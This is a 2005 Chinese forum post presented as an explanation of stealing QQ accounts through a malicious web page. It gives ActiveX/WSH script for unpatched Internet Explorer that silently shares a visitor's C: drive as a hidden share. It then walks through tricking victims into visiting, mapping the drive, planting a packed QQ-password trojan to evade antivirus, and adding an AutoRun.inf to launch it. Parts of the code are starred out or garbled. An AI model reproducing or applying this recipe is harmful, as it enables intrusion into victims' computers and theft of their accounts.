C114门户论坛百科APPEN| 举报 切换到宽版

亚星游戏官网

 找回密码
 注册

只需一步,快速开始

短信验证,便捷登录

搜索
查看: 3026|回复: 10

[通信前沿] 解析:黑客通过网页窃取QQ方法 [复制链接]

军衔等级:

亚星游戏官网-yaxin222  元帅

注册:2005-5-13

爱心徽章,06年为希翼小学奉献爱心纪念徽章

发表于 2005-7-13 09:57:00 |显示全部楼层
  要想偷别人的QQ,方法有很多了。利用恶意网页使对方的电脑被共享出来是很有趣的一招。方法是:在你的网站网页中加入如下内容的代码:

<script language=Java Script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject() Shl.RegWrite("HKLM//Software//微软//Windows//CurrentVersion//Network//LanMan//RWC$//Flafgs",302,"REG_DWORD");
Shl.RegWrite("HKLM//Software//微软//Windows//CurrentVersion//Network//LanMan//RWC$//Type",0,"REG_DWORD");
Shl.RegWrite("HKLM//Software//微软//Windows//CurrentVersion//Network//LanMan//RWC$//Path","C://");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
</script>

  上面的代码大家一定很容易读懂,简单说来就是通过修改对方注册表中的键值,把对方的C盘共享出来,如果想让对方的其他盘都共享请自行设置。

  述代码中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表Windows Scripting Host(WSH)的外壳对象。WSH是MicroSoft提供的一种基于32位Windows平台的、与语言无关的脚本说明机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。WSH使得脚本可以被实行,就象实行批处理一样。以“Shl.RegWrite”开头的这几句代码的作用是写入浏览者的注册表,就是它们使得对方的硬盘被共享的。把“Flags”的键值设为00000302可以隐藏共享,使对方无法发现,非常隐蔽。

  网页做好后,把它上传你的主页空间,骗他浏览你的网页(就看你的嘴皮子功夫了),如果对方的IE没有打补丁(网上这样的电脑有很多),就可以把他的C盘共享出来。整个方法的原理就是把com.ms.activeX.ActiveXComponent对象嵌入<APPLET>标记中,这样会导致任意创建和说明实行ActiveX对象,使大家可以创建任意文件、运行程序、写注册表。未打补丁的IE,在打开含有上述代码的网页时不会有任何警告,大家就是利用这个漏洞把对方的硬盘被共享出来。

  等对方中招后,就把对方的硬盘映射过来,可以使用net use命令,也可以使用网络刺客II等App。下一步可以给对方植入一个盗QQ的App,比方说QQ杀手等,注意一定要用ASPack或其他加壳App给木马加壳(其实就是另类“压缩”),防止杀毒App发现。

  最后,打开记事本键入以下内容:

[AutoRun]
open=winnt32.exe

  保存为AutoRun.inf,其中的winnt32.exe为木马文件。把AutoRun.inf和winnt32.exe一起拷到对方某分区的根目录下。这样,只要他双击该分区就会中木马!这样可以的增加木马运行的主动性!须知许多人现在都非常警惕,不熟悉的文件他们轻易的不会运行,而这种方法就很难防范了。

  以后,你就等着用邮箱收信收对方的QQ密码吧。

  注意,本文只是技术交流,大家不要随意盗取别人的QQ。同时为了保障安全大家没有完全刊登源代码。敬请原谅!

举报本楼

本帖有 10 个回帖,您需要登录后才能浏览 登录 | 注册
您需要登录后才可以回帖 登录 | 注册 |

手机版|C114 ( 沪ICP备12002291号-1 )|联系大家 |网站地图  

GMT+8, 2024-11-25 11:49 , Processed in 0.117324 second(s), 16 queries , Gzip On.

Copyright © 1999-2023 C114 All Rights Reserved

Discuz Licensed

回顶部
XML 地图 | Sitemap 地图